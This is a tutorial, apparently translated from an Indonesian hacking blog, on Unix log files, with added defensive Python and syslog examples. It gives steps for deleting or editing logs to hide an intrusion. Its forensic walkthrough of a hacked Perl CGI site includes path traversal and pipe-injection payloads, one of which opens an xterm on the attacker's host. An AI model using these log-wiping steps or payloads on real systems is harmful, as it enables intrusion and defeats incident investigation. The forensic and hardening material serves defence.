remove your trace
Hehehe... what a grand title. Which band's song is that?
Hold on, what does a song have to do with hacking on a *nix machine? No, no, no. Same "song", hacking; so where do I come in?
Okay then, rather than going on too long (lebay, shirt size L), straight to the point and a little thrifty with words.
A log file is a file that records what anyone does on a machine. To read or change the system logs you need root (su). Depending on the type, a log file is opened and edited with a text editor or with a hex editor. Type? Are there different types of log file?
Here are the types of log file I know of; if I have made a mistake, friends, please correct me, I am still learning.
1. .history (.bash_history, .sh_history, ...): a record of the commands a user typed, stored in the user's home directory. Plain text, so it is easy to edit or delete, as that user or as root.
2. acct or pacct: process accounting. It records every process executed (command name, user, CPU time), but not the command's arguments, so it grows a lot every day. The raw file is read with lastcomm, and the daily summary is usually kept in /var/adm/savacct.
3. access_log: the web server's record of every request: client host, remote ident/login, timestamp, the HTTP request line, status code and bytes sent. Used by NCSA httpd and Apache. Plain text, so it is very easy to edit with a text editor.
4. aculog: a record of dial-out modem use (tip/cu).
5. lastlog: the most recent login of each user, with the terminal and the originating host/IP. It is a binary file indexed by UID (read with lastlog); failed attempts are not kept here but in loginlog. It can be emptied with a single command.
6. loginlog: records only failed logins, and (on Solaris) only after 5 consecutive failures. Plain text, so very easy to delete or edit.
7. messages: everything syslog emits by default. Plain text, so very easy to delete or edit.
8. sulog: every su attempt, successful or not. Plain text, so very easy to delete or edit.
9. utmp: who is logged in on the machine right now; the who and w commands read it to show who is hanging around on the box. On Solaris the file is utmpx. Binary.
10. wtmp: the history of all logins and logouts (ftp sessions included, not only ftp); the last command reads it. On Solaris it is wtmpx. Binary, so use a hex editor (or a tool that knows the record layout) to edit it.
11. vold.log: errors from the volume manager on machines that use removable media (CD-ROM, floppy, etc.).
12. xferlog: the ftp daemon's transfer log, which files were uploaded and downloaded (almost the same role as wtmp for ftp sessions).
13. syslog: the central logging facility that most of the above are fed through; see below.
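The reason wtmp and utmp need a hex editor rather than vi is that they are arrays of fixed-size C structs. As an added example, not from the original post, the script below decodes that layout, pairs logins with logouts the way last(1) does, and flags the two traces that careless log cleaning leaves behind: a login record whose user field was zeroed, and a logout whose login record was cut out. The record layout is glibc's struct utmp on x86_64 Linux (an assumption: other libcs, architectures and Solaris utmpx differ), and the sample records are constructed.

```python
import struct

# Layout of one glibc "struct utmp" record on x86_64 Linux: 384 bytes.
# Assumption: other libcs/architectures (and Solaris utmpx/wtmpx) differ,
# so check sizeof(struct utmp) on the target before trusting the offsets.
UTMP_FMT = "<h2xi32s4s32s256shhiii4i20x"
UTMP_SIZE = struct.calcsize(UTMP_FMT)      # 384
USER_PROCESS, DEAD_PROCESS = 7, 8          # ut_type values from <utmp.h>

def pack_record(ut_type, pid, line, user, host, tv_sec):
    """Build one record; used here only to construct sample wtmp data."""
    return struct.pack(UTMP_FMT, ut_type, pid, line.encode(), b"", user.encode(),
                       host.encode(), 0, 0, 0, tv_sec, 0, 0, 0, 0, 0)

def _cstr(raw):
    """NUL-terminated fixed-width C string -> str."""
    return raw.split(b"\0", 1)[0].decode("latin-1")

def parse_wtmp(data):
    """Decode a wtmp/utmp byte string into dicts; a trailing partial record is ignored."""
    recs = []
    for off in range(0, len(data) - len(data) % UTMP_SIZE, UTMP_SIZE):
        f = struct.unpack_from(UTMP_FMT, data, off)
        recs.append({"type": f[0], "pid": f[1], "line": _cstr(f[2]),
                     "user": _cstr(f[4]), "host": _cstr(f[5]), "time": f[9]})
    return recs

def sessions(recs):
    """Pair logins with logouts like last(1): (user, line, host, login, logout)."""
    out, open_by_key = [], {}
    for r in recs:
        key = (r["line"], r["pid"])
        if r["type"] == USER_PROCESS:
            open_by_key[key] = len(out)
            out.append([r["user"], r["line"], r["host"], r["time"], None])
        elif r["type"] == DEAD_PROCESS and key in open_by_key:
            out[open_by_key.pop(key)][4] = r["time"]
    return [tuple(s) for s in out]

def find_anomalies(recs):
    """Traces that log cleaning leaves behind: a zeroed login record (type kept,
    user blanked) or a logout whose login record has been removed."""
    issues, seen = [], set()
    for i, r in enumerate(recs):
        key = (r["line"], r["pid"])
        if r["type"] == USER_PROCESS:
            if r["user"] == "":
                issues.append((i, "login record with blank user (zeroed?)"))
            seen.add(key)
        elif r["type"] == DEAD_PROCESS:
            if key not in seen:
                issues.append((i, "logout on %s with no matching login" % r["line"]))
            seen.discard(key)
    return issues

# Constructed sample: one normal session, one zeroed login, one orphaned logout
SAMPLE_WTMP = b"".join([
    pack_record(USER_PROCESS, 1234, "pts/0", "alice", "192.0.2.9", 1224797565),
    pack_record(DEAD_PROCESS, 1234, "pts/0", "", "", 1224799000),
    pack_record(USER_PROCESS, 1300, "pts/1", "", "", 1224800000),
    pack_record(DEAD_PROCESS, 1400, "pts/2", "", "", 1224801000),
])

if __name__ == "__main__":
    recs = parse_wtmp(SAMPLE_WTMP)
    for s in sessions(recs):
        print("session:", s)
    for idx, why in find_anomalies(recs):
        print("record %d: %s" % (idx, why))
```

To run it against a real file, replace SAMPLE_WTMP with open("/var/log/wtmp", "rb").read() on a machine whose struct utmp matches the format string; the anomaly check is the same one an admin runs after a suspected break-in, so blanking or cutting records is not as quiet as it looks.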
Now that we know a little about the types, let's look a bit further. Most of the files above are fed through syslog. Its "heart" is the daemon syslogd. When syslogd starts it reads its configuration from /etc/syslog.conf, which says where each kind of message goes, and it accepts messages from three sources:
a. /dev/klog (kernel messages)
b. /dev/log (programs running on the local machine)
c. UDP port 514 (programs running on other machines on the network)
The third source cuts both ways: syslog.conf can also send this machine's messages to another host, and that copy is out of reach of anyone cleaning the local files.
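An added example, not from the original post: a minimal /etc/syslog.conf in the classic selector/action syntax. The first two lines keep everything on the box, which is the situation this whole page relies on; the last line also forwards every message to a second host over UDP 514, so a cleaned local file no longer tells the whole story. The host name loghost and the file names are assumptions.

```conf
# local files only: anyone who gets root can edit or delete these
# (old syslogd wants a TAB, not spaces, between selector and action)
*.info;mail.none;authpriv.none	/var/log/messages
authpriv.*	/var/log/secure

# also send a copy off-box: @host means "forward over UDP port 514"
# (assumed host name; it must run a syslogd that accepts remote messages,
# e.g. syslogd -r on the old Linux sysklogd)
*.*	@loghost
```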
So we know a bit about log files, but... where are they? This is the abstract part: the location can be changed, and a sharp admin moves the files into his safe and hides them as tightly as a secret that only the admin and God know (syslog.conf tells you where the syslog-fed ones went). Don't despair, though; in my experience plenty of admins are careless and leave everything parked at the defaults. "Because the default is not secure", as the saying goes.
Where the log files live by default:
• /usr/adm
• /var/adm
• /var/log
Once again: absolutely not. If you want to clear logs, just come to the admin, ask for the password, ask for the log file, and ask permission to do whatever you like with it; that is 100% halal. Hehehe. Just kidding.
OK, we have found the log file, now how? Take a wet cloth and wipe the monitor, that will clean it. Hehehe. Kidding again.
The blunt way is rm -rf; syntax: rm -rf [path], for example rm -rf /var/log/wtmp. For the plain-text logs (messages, sulog, access_log, .history) you can instead open the file in a text editor such as vi / nano / pico and delete only the lines that concern you, which is no harder than editing lilo.conf for a dual boot. Two caveats: a missing wtmp or a hole in messages is itself a loud trace that any admin will notice, and utmp, wtmp and lastlog are binary files, so a text editor corrupts them (that is what the hex editor is for).
Right, let's keep going. Tired already? Make some tea, coffee or milk, and don't forget the snacks, to keep the spirit up. GO, GO, GO!
OK, now we'll dissect a log file to find a vulnerability on our own machine. Once again, if I make a mistake, I apologise to the seniors (mas, om, mbak, tante, sister) and ask their permission. "Keeping knowledge from each other is forbidden". Hehehe.
Here is an example from the case of http://www.c**.co.id. I once did forensics on that server; the web programmer used Perl CGI scripts, and the server was torn apart by a mad cracker who was sloppy enough not to remove his tracks from access_log (his IP is masked):
10.0.*.** - - [24/Oct/2008:01:02:45 +0530] "GET / HTTP/1.0" 200 3008
10.0.*.** - - [24/Oct/2008:01:02:45 +0530] "GET /A1.jpg HTTP/1.0" 200 3456
10.0.*.** - - [24/Oct/2008:01:02:45 +0530] "GET /V90.jpg HTTP/1.0" 200 6943
10.0.*.** - - [24/Oct/2008:01:02:45 +0530] "GET /RG7.jpg HTTP/1.0" 200 9854
Description: the attacker, IP 10.0.*.**, is only looking at the main web page here, and this was recorded at 01:02:45.
10.0.*.** - - [24/Oct/2008:01:02:45 +0530] "GET /index.cgi?page=contact.shtml HTTP/1.0" 200 309
10.0.*.** - - [24/Oct/2008:01:02:45 +0530] "GET /NOW.jpg HTTP/1.0" 200 3456
10.0.*.** - - [24/Oct/2008:01:02:45 +0530] "GET /index.cgi?page=layanan.shtml HTTP/1.0" 200 309
10.0.*.** - - [24/Oct/2008:01:02:45 +0530] "GET /9RG7.jpg HTTP/1.0" 200 9854
Description: the attacker has not done anything difficult yet; he is still looking at the site and trying its links. Note the pattern, though: every page goes through index.cgi with a page= parameter.
10.0.*.** - - [24/Oct/2008:01:02:45 +0530] "GET /cgi-bin/ HTTP/1.0" 403 272
Description: the attacker starts probing. He tries to list the /cgi-bin/ directory and gets a 403. What does 403 mean? Forbidden, dude.
10.0.*.** - - [24/Oct/2008:01:02:45 +0530] "GET /index.cgi HTTP/1.0" 200 3009
10.0.*.** - - [24/Oct/2008:01:02:45 +0530] "GET /index.cgi?page=index.cgi HTTP/1.0" 200 399
Description: the attacker continues, now following the link pattern he has seen. First he requests http://www.c**.co.id/index.cgi, then he tries http://www.c**.co.id/index.cgi?page=index.cgi.
From here the attacker can read the index.cgi script itself. Read it from where? From his browser: the script's source appears in the browser window.
How can this happen?
The attacker passed the script's own file name, index.cgi, as the page parameter, and the script displayed the contents of that file. So the attacker used index.cgi to display its own source code.
Source code:
01: #!/usr/bin/perl
02: # perl script to display a page as requested by the arguments
03:
04: require "../cgi-bin/cgi-lib.pl";
05:
06: &ReadParse(*input);
07:
08: $filename = $input{page};
09: if ($filename eq "") {
10:     $filename = "main.html";
11: }
12:
13: print &PrintHeader;
14:
15: $filename = "/usr/local/apache/htdocs/" . $filename;
16: open(FILE, $filename);
17: while (<FILE>) {
18:     print $_;
19: }
20: close(FILE);
Now we can see the hole, and learn from it. There is no validation at all of the page parameter passed to index.cgi. The file name from the URL is caught in the variable $filename on line 08, prefixed with the absolute path /usr/local/apache/htdocs/ on line 15, and opened on line 16. Two things make this worse than a simple "read any .html" bug: nothing stops the name from containing ../ to walk out of the document root, and line 16 uses Perl's two-argument open, which interprets the string itself, so a name ending in | is run as a shell command and its output is read as the "file".
Which means, yes, we can easily pull any file the web server user can read straight off the server:
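As an added example of how the page parameter should have been handled, here is a hardened counterpart written in Python rather than Perl; it is not the site's code. resolve_page allow-lists the name (a bare file name, only the page types the site serves), joins it to the same docroot, canonicalises the result and checks that it still lies under the docroot; read_page then opens it with an explicit mode, so no string is ever interpreted as a pipe or handed to a shell. The four attacker inputs are the ones from the access_log above (with a made-up IP).

```python
import os
import re

DOCROOT = "/usr/local/apache/htdocs"       # same docroot the page's index.cgi uses
DEFAULT_PAGE = "main.html"
# allow-list: a bare file name, only the page types the site actually serves;
# this alone excludes '/', '..', '|', newline and the .cgi source itself
SAFE_PAGE = re.compile(r"^[A-Za-z0-9_-]+\.(html|shtml)$")

def resolve_page(page, docroot=DOCROOT):
    """Map the ?page= parameter to an absolute path, or raise ValueError."""
    if page is None or page == "":
        page = DEFAULT_PAGE
    if not SAFE_PAGE.match(page):
        raise ValueError("rejected page name: %r" % page)
    root = os.path.realpath(docroot)
    full = os.path.realpath(os.path.join(root, page))
    if os.path.commonpath([root, full]) != root:    # defence in depth against traversal
        raise ValueError("page escapes docroot: %r" % page)
    return full

def read_page(page, docroot=DOCROOT):
    """Open the resolved file read-only; the name never reaches a shell or a magic open."""
    with open(resolve_page(page, docroot), "rb") as fh:
        return fh.read()

# Inputs taken from the attacker's requests in the access_log above (IP made up)
ATTACKER_INPUTS = [
    "index.cgi",
    "/../../../../../../../../../etc/passwd",
    "|ls -la /\nid\nwhich xterm|",
    "|xterm -display 10.0.1.2:0.0 &|",
]

def which_are_rejected(inputs=ATTACKER_INPUTS):
    """Return the inputs resolve_page refuses; every attacker input should be here."""
    rejected = []
    for p in inputs:
        try:
            resolve_page(p)
        except ValueError:
            rejected.append(p)
    return rejected

if __name__ == "__main__":
    print("contact.shtml ->", resolve_page("contact.shtml"))
    for bad in which_are_rejected():
        print("rejected:", repr(bad))
```

The allow-list is doing the real work; the realpath/commonpath check is there so that a later relaxation of the regex (say, to permit subdirectories) cannot quietly reintroduce traversal.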
10.0.*.** - - [24/Oct/2008:01:02:45 +0530] "GET /index.cgi?page=/../../../../../../../../../etc/passwd HTTP/1.0" 200 786
Description: now the attacker goes looking for the password file... wow.
10.0.*.** - - [24/Oct/2008:01:02:45 +0530] "GET /index.cgi?page=|ls+-la+/%0aid%0awhich+xterm| HTTP/1.0" 200 1399
10.0.*.** - - [24/Oct/2008:01:02:45 +0530] "GET /index.cgi?page=|xterm+-display+10.0.*.**:0.0+%26| HTTP/1.0" 200
Description: this attacker understands Unix and Perl. He is no longer trying to open a file; he is using the pipe character "|" followed by commands. With two-argument open, a string that ends in "|" makes Perl run it as a shell command and read the command's standard output as if it were the file, so whatever is written in the page parameter gets executed. The leading "|" turns the /usr/local/apache/htdocs/ prefix into a harmless first stage of a pipeline (it fails, being a directory), and the %0a newlines separate further commands. Here the attacker makes 2 requests:
http://www.c**.co.id/index.cgi?page=|ls...ich+xterm|
Here it is clear the attacker executes the commands ls -la /, id and which xterm. What does he get from that?
He gets a listing of the files in the root directory from ls -la /, the effective user id the index.cgi process runs as from id, and the path of the xterm binary from which xterm.
The second request:
http://www.c**.co.id/index.cgi?page=|xt...*:+0.0%26|
The attacker runs "xterm -display 10.0.*.**:0.0 &" (%26 is the & that backgrounds it): xterm starts on the server, as the web server user, and pops its window up on the X display of the attacker's machine. What then? Well, he has a shell on the box; find a user, find a password, and he is in.
So from the logs the attacker left behind we now know the bug on this machine.
That's all from me on opening and cleaning log files, and on using them to find a vulnerability on a machine.
Hopefully this article is useful for the progress of IT security in Indonesia. I ask the more senior people, the champions in this field, to correct me, as I am still learning.
Thanks to everyone in all the forums.
Warmest regards
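An added example, not part of the original post: the same access_log reading done with a script, so it scales past a handful of lines. It parses the common log format, pulls out the page parameter exactly as the CGI would see it (URL-decoded, + to space, %0a to newline), and tags each request with the indicators walked through above: a 403 on /cgi-bin/, a .cgi name asked for as a page, "..", and the pipe/newline characters of command injection. The log lines are constructed to mirror the page's excerpt; the IPs 10.0.1.2 and 192.0.2.9, the timestamps and the byte counts are made up.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache/NCSA common log format: host ident user [time] "request" status bytes
CLF = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) (\S+)" (\d{3}) (\S+)$')

# Constructed sample modelled on the page's excerpt (IPs, times and sizes are made up)
SAMPLE_LOG = """\
10.0.1.2 - - [24/Oct/2008:01:02:45 +0530] "GET / HTTP/1.0" 200 3008
192.0.2.9 - - [24/Oct/2008:01:02:46 +0530] "GET /index.cgi?page=layanan.shtml HTTP/1.0" 200 309
10.0.1.2 - - [24/Oct/2008:01:02:47 +0530] "GET /index.cgi?page=contact.shtml HTTP/1.0" 200 309
10.0.1.2 - - [24/Oct/2008:01:02:50 +0530] "GET /cgi-bin/ HTTP/1.0" 403 272
10.0.1.2 - - [24/Oct/2008:01:02:55 +0530] "GET /index.cgi?page=index.cgi HTTP/1.0" 200 399
10.0.1.2 - - [24/Oct/2008:01:03:10 +0530] "GET /index.cgi?page=/../../../../../../../../../etc/passwd HTTP/1.0" 200 786
10.0.1.2 - - [24/Oct/2008:01:03:30 +0530] "GET /index.cgi?page=|ls+-la+/%0aid%0awhich+xterm| HTTP/1.0" 200 1399
10.0.1.2 - - [24/Oct/2008:01:03:41 +0530] "GET /index.cgi?page=|xterm+-display+10.0.1.2:0.0+%26| HTTP/1.0" 200 57
"""

def parse_line(line):
    """One CLF line -> dict, with the query string decoded the way the CGI sees it."""
    m = CLF.match(line)
    if not m:
        return None
    host, ts, method, target, proto, status, size = m.groups()
    parts = urlsplit(target)
    params = {k: v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    return {"host": host, "time": ts, "method": method, "path": parts.path,
            "params": params, "status": int(status)}

def classify(req):
    """Return the attack indicators present in one parsed request."""
    tags = []
    if req["path"].startswith("/cgi-bin") and req["status"] == 403:
        tags.append("cgi-dir-probe")            # feeling for the script directory
    page = req["params"].get("page")
    if page is None:
        return tags
    if page.lower().endswith((".cgi", ".pl")):
        tags.append("source-disclosure")        # the script asked to show itself
    if ".." in page:
        tags.append("path-traversal")           # walking out of the docroot
    if any(c in page for c in "|;`\n"):
        tags.append("command-injection")        # pipe / newline into open()
    return tags

def triage(log_text):
    """Group suspicious requests by client: {host: [(time, tags, page_or_path)]}."""
    findings = {}
    for line in log_text.splitlines():
        req = parse_line(line)
        if req is None:
            continue
        tags = classify(req)
        if tags:
            findings.setdefault(req["host"], []).append(
                (req["time"], tags, req["params"].get("page", req["path"])))
    return findings

if __name__ == "__main__":
    for host, events in triage(SAMPLE_LOG).items():
        print(host)
        for ts, tags, detail in events:
            print("  %s %-32s %r" % (ts, ",".join(tags), detail))
```

Run it over a real access_log with triage(open(path).read()); only the attacker's host shows up, in the same order the page walks through by hand (probe, source disclosure, traversal, then two command injections), and the decoded page value shows the newline-separated commands that the raw URL hides behind %0a.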